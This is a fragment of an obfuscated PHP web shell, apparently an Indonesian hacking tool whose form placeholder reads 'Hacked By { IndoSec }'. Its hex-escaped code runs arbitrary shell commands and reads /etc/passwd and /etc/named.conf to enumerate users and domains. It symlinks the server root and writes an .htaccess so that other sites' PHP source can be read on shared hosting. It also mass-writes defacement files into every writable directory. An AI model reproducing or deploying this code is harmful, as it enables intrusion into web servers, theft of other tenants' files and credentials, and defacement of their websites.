"\x3c\x74\x72\x3e\12\x9\11\11\x9\11\x9\x9\11\x3c\x74\x64\40\143\154\141\x73\x73\x3d\x27\x74\145\170\164\55\154\x65\x66\x74\x20\160\x6c\x2d\x31\x27\76{$user}\74\x2f\x74\144\76\xa\11\11\11\x9\x9\x9\11\x9\x3c\x74\144\76\12\x9\x9\x9\x9\11\x9\x9\11\x9\x3c\141\40\150\162\145\146\x3d\47\163\x79\155\x2f\162\157\x6f\x74\57\150\x6f\x6d\x65\57{$user}\x2f\x70\165\142\154\151\x63\137\x68\x74\155\154\x27\40\164\141\x72\147\145\x74\75\47\x5f\142\x6c\x61\156\153\47\76\123\x79\x6d\x6c\151\x6e\153\x20\74\x2f\x61\x3e\xa\11\11\11\x9\11\11\11\11\x3c\x2f\x74\x64\x3e\xa\x9\11\x9\x9\x9\x9\x9\11\x3c\164\144\76\xa\11\11\x9\x9\x9\x9\x9\11\x9\74\x61\40\150\x72\x65\146\75\47{$pageFTP}\x2f\x73\x79\x6d\57\162\x6f\157\164\x2f\150\157\x6d\145\57{$user}\x2f\x70\165\142\x6c\x69\x63\137\x68\x74\155\x6c\x27\x20\164\141\x72\147\145\x74\75\47\137\142\154\x61\156\153\47\76\106\124\120\x3c\x2f\x61\x3e\12\11\11\x9\11\11\x9\11\x9\74\57\164\x64\76\xa\11\x9\11\11\11\11\x9\x3c\x2f\164\x72\x3e"; flush(); flush(); } die("\x3c\x2f\164\162\76\x3c\x2f\x74\x61\x62\154\x65\76\x3c\x2f\x64\151\166\x3e"); } } echo "\x72\x65\141\x64\x20\x2f\x65\x74\143\57\160\x61\x73\x73\x77\144\12\x9\x9\x3c\146\157\162\155\x20\x6d\145\164\150\x6f\144\x3d\47\x70\157\x73\164\47\x20\141\x63\164\151\x6f\x6e\x3d\47\77\144\x69\x72\75{$dir}\x26\141\153\x73\x69\x3d\163\x79\155\x5f\x62\x79\x70\141\163\46\163\x61\x76\145\x3d\61\x27\x3e\12\11\x9\x9\x3c\x74\145\170\x74\x61\x72\x65\x61\x20\x63\x6c\x61\163\163\x3d\x27\146\x6f\x72\155\55\143\x6f\156\164\x72\x6f\x6c\47\40\162\x6f\167\x73\75\47\70\x27\40\x6e\x61\155\145\75\47\146\151\154\145\47\76"; flush(); $file = "\x2f\x65\x74\143\x2f\160\141\x73\163\x77\x64"; $r3ad = @fopen($file, "\x72"); if ($r3ad) { $content = @fread($r3ad, @filesize($file)); echo '' . htmlentities($content) . ''; } elseif (!$r3ad) { $r3ad = @show_source($file); } elseif (!$r3ad) { $r3ad = @highlight_file($file); } elseif (!$r3ad) { for ($uid = 0; $uid < 1000; $uid++) { $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { print "{$val}\x3a"; } print "\12"; } } } flush(); echo "\74\57\164\x65\170\x74\141\x72\145\x61\x3e\x3c\142\162\x2f\76\xa\11\11\11\74\151\156\x70\x75\x74\40\164\x79\160\145\75\47\163\165\142\155\x69\164\47\x20\x63\x6c\141\163\163\x3d\x27\x62\x74\x6e\x20\142\x74\x6e\x2d\x64\x61\x6e\x67\x65\162\40\x62\164\156\x2d\142\154\x6f\143\x6b\47\x20\166\141\154\165\x65\x3d\47\x53\171\x6d\x6c\x69\x6e\153\x27\x2f\x3e\xa\x9\x9\x3c\x2f\146\157\162\155\x3e"; flush(); die; } goto kOh3B; Ednnu: if ($_GET["\141\x6b\x73\151"] == "\155\141\x73\x64\x65\146") { function tipe_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\57{$dirb}"; $lokasi = $dirc . "\57" . $namafile; if ($dirb === "\56") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "\56\56") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\104\157\x6e\x65\x20\x3e\x20{$lokasi}\xa"; file_put_contents($lokasi, $isi_script); $masdef = tipe_massal($dirc, $namafile, $isi_script); } } } } } } function tipe_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $lokasi = $dirc . "\57" . $namafile; if ($dirb === "\x2e") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "\56\56") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\x44\157\156\145\x20\76\x20{$dirb}\x2f{$namafile}\xa"; file_put_contents($lokasi, $isi_script); } else { echo "\74\x70\76\x67\x61\x67\141\x6c\74\x2f\x70\x3e"; } } } } } } if ($_POST["\163\164\141\x72\x74"]) { echo "\133\40\74\x61\40\x68\162\x65\146\x3d\47\x3f\x64\x69\162\x3d{$dir}\x27\x3e\x4b\145\155\142\x61\x6c\151\x3c\57\141\x3e\x20\135\12\x9\11\x9\74\x74\x65\170\x74\141\162\145\x61\40\143\x6c\141\x73\x73\x3d\x27\x66\157\162\155\x2d\143\x6f\x6e\164\x72\x6f\x6c\x27\40\x72\x6f\x77\x73\75\x27\67\47\40\x64\151\x73\x61\x62\154\145\144\x3d\47\x27\x3e"; if ($_POST["\164\151\x70\145"] == "\x6d\x61\x68\141\154") { tipe_massal($_POST["\x64\137\x64\151\x72"], $_POST["\144\137\146\151\154\x65"], $_POST["\x73\143\162\151\160\x74"]); } elseif ($_POST["\164\151\160\x65"] == "\155\x75\162\x61\x68") { tipe_biasa($_POST["\x64\137\144\x69\x72"], $_POST["\x64\137\146\x69\x6c\x65"], $_POST["\163\x63\x72\151\160\x74"]); } echo "\74\x2f\x74\x65\170\164\141\x72\x65\141\x3e\x3c\142\162\x2f\x3e"; } else { echo "\74\x66\157\162\x6d\x20\x6d\145\164\x68\x6f\144\x3d\x27\160\157\163\x74\47\x3e\12\x9\11\11\x9\x3c\143\x65\x6e\164\145\x72\76\12\11\11\11\x9\11\x3c\150\x35\x3e\x54\151\x70\x65\40\x3a\74\x2f\x68\65\x3e\xa\x9\11\x9\11\11\74\x69\x6e\x70\x75\164\x20\x69\144\x3d\47\164\157\x67\x67\x6c\145\55\x6f\x6e\47\40\143\154\x61\163\163\x3d\x27\164\157\147\147\154\x65\x20\x74\x6f\147\147\154\x65\55\x6c\x65\146\x74\47\40\x6e\x61\x6d\145\75\47\x74\151\160\145\47\x20\x76\141\x6c\165\x65\75\47\x6d\x75\162\141\x68\47\40\164\x79\160\x65\75\x27\162\141\144\151\x6f\x27\40\143\x68\x65\x63\153\145\x64\x3e\12\x9\x9\x9\11\11\74\x6c\x61\142\145\x6c\40\146\157\162\x3d\47\x74\x6f\147\x67\154\x65\x2d\157\156\47\x20\143\x6c\x61\x73\x73\75\47\142\165\x74\x6e\x27\76\102\151\141\x73\x61\x3c\x2f\x6c\x61\142\145\x6c\76\xa\x9\x9\11\x9\11\74\151\x6e\x70\165\164\40\151\x64\75\x27\x74\157\x67\147\154\x65\55\x6f\146\x66\x27\x20\x63\154\141\x73\163\x3d\47\x74\157\147\x67\x6c\x65\x20\x74\157\147\x67\154\x65\55\x72\151\x67\150\164\47\x20\156\141\x6d\145\75\47\x74\x69\160\145\47\40\x76\141\x6c\x75\x65\x3d\x27\155\141\150\141\x6c\x27\40\164\171\160\x65\75\x27\x72\x61\x64\151\157\x27\x3e\12\x9\11\11\x9\x9\74\154\x61\142\x65\154\40\x66\157\162\x3d\47\x74\x6f\x67\x67\x6c\145\x2d\x6f\x66\146\47\x20\x63\x6c\141\x73\x73\75\47\x62\x75\x74\x6e\x27\76\115\x61\163\x61\154\74\x2f\154\141\x62\145\x6c\76\12\x9\11\11\11\x3c\57\x63\x65\156\x74\x65\x72\76\40\xa\11\11\x9\x9\x3c\150\x35\x3e\74\151\x20\143\154\x61\x73\x73\x3d\x27\x66\141\x20\x66\x61\x2d\146\x6f\x6c\x64\145\x72\x27\x3e\74\x2f\x69\x3e\x20\114\x6f\x6b\x61\163\151\x20\x3a\74\x2f\150\65\x3e\xa\11\11\11\x9\x3c\151\156\x70\165\x74\40\x74\171\160\x65\x3d\47\164\x65\170\164\x27\40\156\x61\x6d\x65\75\47\x64\x5f\144\151\162\47\x20\166\141\x6c\x75\145\75\47{$dir}\x27\40\x63\154\x61\x73\x73\75\47\x66\157\162\x6d\x2d\143\157\x6e\x74\162\157\x6c\47\x3e\74\142\x72\76\12\11\x9\x9\11\x3c\x68\x35\x3e\74\151\x20\143\154\141\163\163\x20\75\47\x66\x61\40\x66\x61\55\x66\151\x6c\x65\x27\x3e\74\x2f\151\x3e\x20\116\141\x6d\141\40\x46\151\x6c\x65\x20\x3a\74\x2f\150\65\x3e\xa\x9\11\x9\11\x3c\151\156\x70\x75\164\40\x74\171\x70\x65\75\47\164\x65\x78\164\47\40\156\x61\155\145\x3d\47\x64\137\x66\x69\x6c\x65\x27\x20\141\x75\164\157\x63\157\155\160\x6c\x65\x74\x65\x3d\47\x6f\146\146\x27\x20\x70\x6c\x61\143\145\x68\157\x6c\x64\x65\162\x3d\47\x5b\105\170\135\40\x69\156\x64\x65\170\x2e\x70\150\x70\x27\x20\143\x6c\x61\x73\x73\x3d\47\146\x6f\x72\155\55\143\157\x6e\164\x72\x6f\154\47\76\x3c\x62\x72\x2f\x3e\xa\11\x9\x9\x9\x3c\150\x35\x3e\74\x69\x20\x63\154\141\x73\163\x20\x3d\47\x66\141\40\x66\x61\x2d\x66\151\154\x65\x27\x3e\74\x2f\x69\76\x20\111\x73\151\40\x46\151\154\145\40\x3a\74\x2f\150\65\76\xa\11\x9\x9\x9\x3c\164\145\x78\164\141\162\145\141\x20\x6e\x61\155\x65\75\47\163\143\x72\151\160\164\x27\x20\x63\154\141\163\x73\x3d\47\146\157\162\x6d\x2d\143\157\156\164\x72\157\154\x27\x20\x72\x6f\167\163\x3d\47\x35\x27\40\x61\x75\x74\157\143\x6f\x6d\160\x6c\x65\164\x65\x3d\47\157\146\146\x27\x20\x70\154\x61\143\x65\150\157\x6c\144\145\162\x3d\47\x5b\x45\170\x5d\x20\x48\141\x63\153\145\144\40\102\171\40\x7b\x20\x49\156\144\157\x53\145\143\x20\x7d\47\76\74\57\x74\145\170\164\x61\x72\145\141\x3e\74\142\162\57\76\12\11\11\x9\11\x3c\151\156\x70\165\164\x20\164\x79\x70\145\x3d\x27\163\165\x62\x6d\x69\x74\47\40\156\141\155\145\x3d\47\163\164\x61\x72\164\x27\x20\166\x61\154\x75\145\75\x27\115\x61\x73\163\40\104\x65\146\x61\143\145\x27\x20\143\154\141\163\x73\75\x27\x62\x74\156\40\x62\164\156\55\x64\x61\x6e\147\x65\x72\40\x66\157\162\x6d\x2d\x63\157\156\x74\x72\x6f\x6c\x27\76\x3c\x62\162\57\76\xa\11\11\11\x3c\x2f\x66\x6f\x72\x6d\76"; } die; } goto fnGp0; xEaUB: $scdir = explode("\57", $dir); goto pbQJd; xQnAH: if ($_GET["\141\x6b\163\151"] == "\x63\x68\x6d\x6f\x64") { $nama = basename($_GET["\x66\151\x6c\x65"]); echo "\74\x66\x6f\x72\155\40\155\x65\164\150\157\144\x3d\47\120\117\x53\x54\47\x3e\xa\11\x9\11\x9\74\150\x35\76\103\x68\155\157\x64\x20\106\x69\x6c\145\40\x3a\x20{$nama}\x20\x3c\x2f\150\65\76\12\x9\11\11\11\x3c\x64\151\166\x20\x63\154\x61\163\x73\x3d\x27\146\157\x72\x6d\x2d\x67\x72\157\165\160\x20\x69\x6e\x70\x75\164\55\147\x72\x6f\x75\160\47\x3e\12\11\x9\11\11\11\74\x69\156\x70\x75\164\40\x74\171\x70\x65\75\x27\x74\x65\x78\164\47\x20\156\x61\x6d\145\x3d\47\160\x65\162\x6d\47\40\x63\154\x61\163\x73\x3d\x27\x66\x6f\x72\155\x2d\143\x6f\156\x74\x72\x6f\154\47\x20\166\141\154\165\145\x3d\x27" . substr(sprintf("\x25\x6f", fileperms($_GET["\x66\x69\x6c\x65"])), -4) . "\x27\x3e\xa\x9\11\x9\x9\11\74\x69\156\x70\x75\164\x20\x74\171\160\x65\x3d\x27\x73\165\142\x6d\151\x74\47\40\143\154\x61\163\x73\75\47\142\x74\156\x20\x62\164\156\55\144\x61\x6e\147\145\162\x20\146\x6f\162\x6d\55\x63\x6f\156\x74\162\157\x6c\x27\x20\x76\141\154\x75\145\x3d\47\103\x68\x6d\x6f\x64\x27\76\xa\11\11\x9\11\x3c\x2f\x64\151\x76\76\xa\x9\11\x9\x3c\57\x66\157\x72\155\76"; if (isset($_POST["\x70\145\162\155"])) { if (chmod($_GET["\x66\151\x6c\145"], $_POST["\x70\145\x72\x6d"])) { echo "\x3c\146\x6f\156\164\x20\143\157\x6c\x6f\162\75\42\x6c\x69\155\x65\x22\76\103\x68\141\156\147\x65\40\x50\145\162\155\x69\x73\163\151\157\156\40\x42\145\x72\150\x61\163\151\x6c\x3c\57\x66\157\x6e\x74\76\x3c\142\x72\57\x3e"; } else { echo "\x3c\x66\x6f\156\x74\40\x63\157\x6c\x6f\x72\x3d\x22\167\x68\x69\x74\x65\42\76\x43\150\141\x6e\147\x65\x20\120\145\x72\155\x69\163\x73\151\x6f\156\x20\x47\141\147\x61\154\74\x2f\146\157\x6e\x74\76\x3c\142\x72\57\x3e"; } } } goto JOAz0; ny8eb: @ini_set("\x6d\141\x78\137\x65\x78\145\x63\165\164\151\157\x6e\x5f\164\x69\x6d\x65", 0); goto XhlRY; VIISu: function exe($cmd) { if (function_exists("\x73\x79\x73\x74\145\x6d")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("\145\170\x65\x63")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists("\160\x61\163\x73\164\150\162\x75")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("\x73\150\145\x6c\x6c\x5f\x65\x78\x65\x63")) { $buff = @shell_exec($cmd); return $buff; } } goto PJRU9; O0b8k: if ($_GET["\x61\x6b\163\x69"] == "\x73\171\x6d\x6c\151\x6e\153") { $full = str_replace($_SERVER["\104\117\x43\x55\115\x45\116\124\x5f\122\x4f\117\124"], '', $path); $d0mains = @file("\x2f\x65\x74\143\x2f\x6e\141\x6d\145\144\x2e\143\157\x6e\x66"); if (!$d0mains) { die("\x5b\40\x3c\141\40\x68\162\145\x66\x3d\x27\77\x64\151\x72\x3d{$path}\46\141\153\x73\151\x3d\x73\171\155\162\x65\141\144\x27\76\102\x79\x70\141\x73\x73\40\x52\145\141\x64\74\57\x61\x3e\40\x5d\40\x5b\40\74\x61\x20\150\162\145\146\75\47\77\144\x69\x72\x3d{$path}\46\141\153\x73\151\x3d\x73\171\x6d\x5f\64\60\x34\x27\76\x53\x79\155\x6c\151\156\153\40\64\x30\64\x3c\x2f\141\76\40\135\40\133\40\x3c\141\40\x68\x72\145\146\x3d\47\77\x64\x69\162\75{$path}\46\x61\153\x73\x69\x3d\x73\171\x6d\x5f\x62\x79\x70\x61\163\x27\x3e\123\171\155\154\x69\x6e\153\x20\x42\x79\x70\141\x73\163\74\57\x61\x3e\x20\x5d\74\x62\162\x2f\76\x3c\x66\x6f\x6e\164\40\x63\157\154\x6f\x72\x3d\47\x72\x65\144\x27\76\x45\x72\x72\157\162\40\x74\151\x64\141\x6b\40\144\x61\x70\141\x74\x20\x6d\x65\155\142\141\143\x61\40\40\57\x65\164\143\x2f\x6e\141\x6d\x65\144\x2e\x63\157\x6e\146\x3c\57\146\157\156\x74\76\74\142\x72\x2f\76\74\142\162\x2f\x3e"); } if ($d0mains) { @mkdir("\151\156\x64\x73\x63\137\163\x79\x6d", 511); @chdir("\x69\x6e\x64\163\143\137\x73\x79\155"); @exe("\154\x6e\x20\55\x73\40\57\x20\x72\x6f\157\x74"); $file3 = "\117\160\x74\151\x6f\x6e\x73\40\111\x6e\144\x65\170\x65\x73\x20\106\157\154\154\157\x77\123\171\x6d\x4c\151\156\x6b\163\12\11\11\x9\104\x69\x72\145\143\164\x6f\x72\x79\111\156\144\145\x78\40\x69\156\x64\x73\x63\x2e\150\x74\x6d\154\12\11\11\11\101\144\x64\124\x79\x70\145\40\x74\x65\170\x74\57\x70\x6c\141\x69\156\40\56\x70\x68\160\xa\11\x9\x9\x41\144\144\x48\x61\156\144\x6c\x65\x72\x20\x74\145\170\x74\x2f\160\154\141\x69\x6e\x20\x2e\160\150\x70\xa\11\x9\x9\x53\141\x74\x69\163\146\x79\40\101\156\x79"; $fp3 = fopen("\x2e\150\164\141\143\143\145\x73\x73", "\167"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\133\40\x3c\141\40\150\x72\145\x66\x3d\47\x3f\144\x69\162\x3d{$path}\x26\x61\153\163\x69\75\x73\x79\x6d\162\x65\x61\x64\x27\x3e\x42\x79\x70\141\x73\x73\x20\122\x65\141\x64\74\x2f\141\x3e\40\135\40\133\40\74\x61\40\150\x72\x65\x66\x3d\47\77\144\151\162\x3d{$path}\x26\x61\153\163\151\75\x73\x79\155\137\x34\60\64\x27\x3e\123\x79\155\x6c\151\x6e\x6b\x20\64\x30\64\x3c\x2f\x61\76\x20\135\40\x5b\x20\74\141\40\150\x72\x65\146\x3d\47\77\x64\151\x72\75{$path}\46\x61\153\x73\151\75\x73\171\155\x5f\142\171\160\141\163\47\76\123\x79\x6d\154\151\x6e\x6b\40\x42\171\160\x61\x73\163\x3c\57\x61\x3e\x20\x5d\12\11\x9\11\74\x64\151\x76\40\143\x6c\141\x73\x73\75\x27\164\x6d\160\x27\76\xa\x9\x9\x9\x3c\x74\x61\142\x6c\x65\x20\x63\154\141\163\163\x3d\47\x74\x65\x78\x74\55\143\x65\156\164\145\162\x20\164\x61\142\154\145\55\x72\145\x73\160\157\x6e\x73\151\166\145\47\x3e\xa\x9\11\x9\x9\74\x74\x68\145\x61\144\40\x63\154\x61\163\163\75\x27\x62\147\55\x69\x6e\146\157\x27\x3e\xa\11\11\11\x9\11\x3c\164\150\x3e\116\x6f\x2e\x3c\57\x74\150\76\12\11\11\11\11\x9\74\164\x68\76\x44\x6f\155\141\x69\156\x73\74\57\x74\x68\76\xa\11\x9\11\11\11\x3c\x74\150\76\125\x73\145\162\x73\74\x2f\164\150\x3e\xa\x9\11\11\x9\11\x3c\164\x68\76\163\x79\x6d\154\x69\x6e\153\40\x3c\57\x74\x68\x3e\xa\x9\x9\11\11\74\x2f\164\x68\x65\x61\x64\x3e"; $dcount = 1; foreach ($d0mains as $d0main) { if (eregi("\172\x6f\x6e\145", $d0main)) { preg_match_all("\43\x7a\157\x6e\x65\40\x22\50\56\x2a\51\x22\x23", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("\57\145\x74\x63\57\x76\141\154\151\x61\163\145\163\x2f" . $domains[1][0])); echo "\x3c\164\x72\x3e\12\11\11\11\11\x9\x9\11\11\74\164\x64\x3e" . $dcount . "\x3c\57\164\144\76\12\x9\11\x9\x9\x9\x9\11\11\x3c\x74\144\40\143\x6c\x61\x73\163\75\x27\x74\x65\x78\x74\55\154\x65\x66\164\47\76\x3c\x61\x20\150\162\145\x66\x3d\x68\164\164\x70\x3a\x2f\x2f\167\167\167\x2e" . $domains[1][0] . "\57\76" . $domains[1][0] . "\74\57\141\x3e\x3c\57\x74\144\x3e\xa\x9\x9\x9\x9\x9\x9\11\11\x3c\164\144\76" . $user["\x6e\x61\x6d\x65"] . "\x3c\x2f\164\144\x3e\12\11\11\x9\11\11\x9\x9\11\x3c\x74\144\76\74\141\40\150\x72\x65\x66\x3d\x27{$full}\57\151\156\144\163\143\137\x73\x79\155\x2f\x72\157\x6f\x74\57\x68\x6f\155\x65\x2f" . $user["\156\x61\x6d\145"] . "\57\x70\x75\x62\x6c\151\x63\x5f\150\164\155\154\x27\x20\164\141\162\147\145\x74\75\x27\137\142\x6c\141\x6e\x6b\47\76\123\171\155\x6c\151\156\x6b\74\57\141\76\x3c\x2f\164\144\76\xa\x9\x9\x9\x9\x9\x9\11\74\x2f\164\x72\76"; flush(); $dcount++; } } } echo "\74\x2f\x74\x61\x62\x6c\x65\x3e\x3c\57\144\x69\166\x3e"; } else { $TEST = @file("\57\x65\x74\143\57\160\x61\163\163\167\144"); if ($TEST) { @mkdir("\151\x6e\144\x73\x63\x5f\163\x79\x6d", 511); @chdir("\x69\x6e\x64\x73\143\x5f\x73\x79\155"); @exe("\154\156\x20\x2d\x73\x20\x2f\x20\162\157\x6f\x74"); $file3 = "\117\160\164\151\x6f\x6e\x73\x20\111\x6e\x64\x65\x78\145\x73\x20\106\x6f\x6c\154\x6f\167\x53\x79\155\114\151\x6e\153\163\12\11\x9\11\11\104\x69\162\x65\143\x74\x6f\x72\171\x49\156\x64\x65\170\x20\x69\x6e\x64\163\x63\x2e\x68\x74\x6d\154\xa\x9\11\x9\x9\101\x64\x64\124\x79\x70\145\x20\x74\145\170\164\57\x70\x6c\141\x69\x6e\x20\x2e\x70\150\x70\xa\x9\x9\11\x9\x41\x64\144\110\x61\x6e\x64\154\x65\162\40\164\145\x78\x74\57\160\154\x61\x69\x6e\40\56\160\150\160\12\x9\11\11\11\x53\141\164\151\x73\x66\x79\40\101\156\x79"; $fp3 = fopen("\56\x68\164\141\x63\x63\145\x73\163", "\167"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\133\x20\74\x61\40\150\162\x65\146\x3d\47\77\x64\151\162\x3d{$path}\x26\141\x6b\x73\151\75\x73\x79\155\x72\145\x61\x64\x27\x3e\x42\x79\x70\141\x73\x73\x20\122\x65\141\144\74\x2f\x61\x3e\x20\135\x20\x5b\x20\74\x61\x20\150\x72\145\146\75\47\x3f\144\151\162\75{$path}\46\x61\153\163\151\75\163\x79\155\x5f\64\x30\64\x27\76\x53\171\x6d\x6c\151\x6e\153\40\64\60\64\x3c\x2f\x61\76\x20\x5d\x20\x5b\40\x3c\141\40\x68\162\x65\x66\75\47\x3f\144\x69\162\75{$path}\x26\141\x6b\163\151\75\163\x79\155\x5f\142\x79\160\x61\x73\47\x3e\123\x79\x6d\x6c\x69\156\153\x20\x42\x79\x70\x61\163\163\x3c\x2f\x61\76\40\135\xa\x9\x9\x9\11\x3c\144\x69\x76\x20\x63\154\141\x73\163\x3d\x27\164\x6d\x70\x27\76\12\11\x9\x9\x9\74\x74\141\x62\x6c\145\40\143\154\141\x73\163\x3d\x27\164\145\x78\x74\55\x63\145\x6e\x74\x65\x72\x20\x74\x61\x62\x6c\145\x2d\162\x65\163\x70\x6f\x6e\163\x69\x76\145\x27\x3e\12\x9\x9\x9\11\x9\74\x74\x68\145\x61\144\40\143\154\141\163\163\75\x27\142\147\55\x77\141\x72\x6e\x69\156\x67\x27\76\xa\x9\x9\11\11\x9\11\74\164\150\x3e\x4e\157\x2e\x3c\57\x74\150\76\xa\11\11\11\x9\x9\x9\x3c\164\150\x3e\125\x73\145\162\163\74\57\x74\x68\76\12\x9\x9\x9\11\x9\x9\74\x74\x68\76\163\171\x6d\154\x69\x6e\153\40\74\57\x74\150\76\xa\x9\x9\x9\11\11\74\57\x74\150\145\141\144\x3e"; $dcount = 1; $file = fopen("\x2f\x65\x74\x63\57\x70\x61\163\x73\x77\x64", "\x72") or die("\125\156\x61\142\154\x65\x20\164\x6f\x20\x6f\160\x65\156\x20\146\151\x6c\145\x21"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("\x2f\134\57\x28\56\x2a\x3f\x29\134\72\x5c\x2f\57\x73", $s, $matches); $matches = str_replace("\150\157\x6d\145\x2f", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "\142\151\x6e" || $matches == "\x65\164\x63\x2f\130\x31\x31\57\146\x73" || $matches == "\166\141\162\x2f\x6c\151\142\x2f\156\x66\163" || $matches == "\166\x61\x72\x2f\x61\162\x70\167\141\x74\x63\x68" || $matches == "\x76\x61\x72\57\147\157\160\x68\x65\162" || $matches == "\163\x62\151\156" || $matches == "\x76\x61\162\x2f\x61\x64\x6d" || $matches == "\165\163\x72\x2f\x67\141\x6d\x65\x73" || $matches == "\166\x61\162\57\146\x74\x70" || $matches == "\x65\164\x63\57\x6e\164\160" || $matches == "\x76\x61\162\57\x77\167\x77" || $matches == "\166\141\162\x2f\x6e\141\x6d\x65\144") { continue; } echo "\74\164\x72\76\xa\11\11\11\11\11\11\x9\x3c\164\x64\x3e" . $dcount . "\x3c\57\x74\144\76\xa\x9\11\11\x9\x9\11\x9\x3c\164\x64\76" . $matches . "\74\x2f\164\144\76\12\x9\11\x9\11\11\11\11\x3c\x74\x64\76\74\x61\40\x68\162\x65\x66\75{$full}\57\x69\x6e\x64\163\143\137\x73\171\x6d\57\162\157\x6f\164\x2f\150\157\x6d\x65\57" . $matches . "\x2f\x70\x75\142\x6c\151\143\137\150\164\x6d\154\40\164\141\x72\x67\x65\x74\75\47\137\x62\154\x61\156\153\x27\76\x53\171\155\154\x69\156\153\74\x2f\x61\76\74\x2f\x74\x64\76\12\x9\x9\11\x9\x9\11\x3c\x2f\x74\162\76"; $dcount++; } fclose($file); echo "\74\x2f\164\x61\x62\x6c\145\x3e\74\57\144\151\x76\76"; } else { if ($os != "\x57\151\156\x64\157\167\163") { @mkdir("\x69\x6e\x64\x73\143\x5f\x73\171\155", 511); @chdir("\151\156\x64\x73\143\137\163\x79\155"); @exe("\x6c\x6e\x20\55\163\x20\57\40\162\x6f\x6f\164"); $file3 = "\x4f\x70\164\151\x6f\x6e\x73\x20\x49\x6e\144\145\170\145\x73\40\x46\x6f\x6c\x6c\157\167\x53\171\x6d\x4c\x69\156\153\x73\12\x9\x9\x9\11\x44\x69\162\145\143\164\x6f\162\171\x49\x6e\x64\x65\x78\x20\151\156\x64\163\x63\56\x68\x74\x6d\x6c\xa\x9\11\11\x9\x41\x64\144\124\171\x70\145\x20\164\145\170\164\57\160\154\x61\x69\x6e\x20\56\x70\150\160\12\11\x9\11\11\x41\144\x64\x48\x61\x6e\x64\x6c\145\162\40\x74\x65\x78\x74\x2f\160\x6c\141\x69\156\x20\56\160\150\x70\12\11\11\11\11\123\x61\164\151\x73\146\x79\x20\101\156\171"; $fp3 = fopen("\x2e\150\x74\141\143\x63\145\163\163", "\167"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\x5b\40\74\141\40\x68\162\x65\146\x3d\47\x3f\144\x69\162\75{$path}\x26\x61\x6b\x73\x69\75\x73\x79\155\162\x65\141\144\x27\76\x42\x79\x70\141\163\x73\40\x52\x65\141\144\74\57\x61\76\x20\x5d\40\133\40\74\141\x20\x68\x72\145\x66\75\47\77\144\151\x72\75{$path}\46\141\x6b\x73\x69\75\x73\171\x6d\137\64\60\x34\47\76\123\x79\x6d\x6c\x69\x6e\x6b\40\x34\x30\x34\74\x2f\141\x3e\x20\135\40\x5b\40\x3c\x61\40\150\162\x65\146\75\47\x3f\144\151\x72\75{$path}\46\x61\153\163\151\75\163\x79\x6d\x5f\x62\171\x70\x61\163\47\76\123\x79\x6d\154\151\156\153\40\x42\x79\160\x61\163\163\x3c\57\x61\x3e\40\x5d\xa\11\x9\11\x9\x3c\144\x69\x76\x20\143\154\141\x73\163\x3d\x27\164\x6d\x70\x27\76\xa\11\x9\11\x9\74\164\x61\142\x6c\145\x20\143\x6c\x61\163\163\75\47\x74\145\170\164\55\143\x65\x6e\164\145\162\40\164\x61\x62\154\145\55\162\145\163\160\157\x6e\163\x69\x76\145\x27\76\12\11\11\11\x9\x9\x3c\x74\150\145\141\144\x20\x63\154\x61\163\x73\75\x27\142\x67\55\144\141\x6e\x67\x65\162\x27\x3e\xa\x9\11\x9\11\x9\11\x3c\164\150\x3e\111\x44\56\x3c\57\164\x68\x3e\12\11\11\x9\x9\11\11\x3c\x74\150\76\x55\163\145\162\x73\x3c\x2f\x74\x68\x3e\xa\11\11\x9\11\x9\x9\74\164\x68\76\x73\171\155\154\x69\156\153\40\x3c\x2f\164\150\x3e\12\x9\x9\x9\11\11\74\x2f\x74\x68\145\x61\144\x3e"; $temp = ''; $val1 = 0; $val2 = 1000; for (; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) { $temp .= join("\72", $uid) . "\xa"; } } echo "\74\x62\x72\57\76"; $temp = trim($temp); $file5 = fopen("\x74\145\163\x74\x2e\x74\170\x74", "\167"); fputs($file5, $temp); fclose($file5); $dcount = 1; $file = fopen("\164\x65\163\164\x2e\x74\170\164", "\x72") or die("\125\156\x61\x62\154\145\40\164\x6f\x20\x6f\x70\x65\x6e\x20\x66\151\154\145\41"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("\x2f\x5c\x2f\x28\56\52\x3f\x29\x5c\x3a\x5c\x2f\57\163", $s, $matches); $matches = str_replace("\150\157\x6d\x65\57", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "\x62\x69\156" || $matches == "\x65\x74\x63\57\130\x31\x31\57\146\163" || $matches == "\x76\141\162\x2f\154\x69\x62\x2f\156\x66\x73" || $matches == "\x76\x61\x72\x2f\x61\x72\160\x77\141\164\x63\x68" || $matches == "\x76\141\x72\x2f\x67\157\160\150\x65\x72" || $matches == "\x73\x62\151\x6e" || $matches == "\166\x61\162\57\141\x64\155" || $matches == "\165\163\162\x2f\x67\141\155\x65\x73" || $matches == "\166\141\162\x2f\146\x74\x70" || $matches == "\145\164\143\x2f\x6e\164\160" || $matches == "\166\x61\x72\x2f\167\167\x77" || $matches == "\166\x61\162\x2f\156\141\x6d\x65\144") { continue; } echo "\74\x74\x72\76\12\11\x9\11\x9\x9\11\11\x3c\164\144\76" . $dcount . 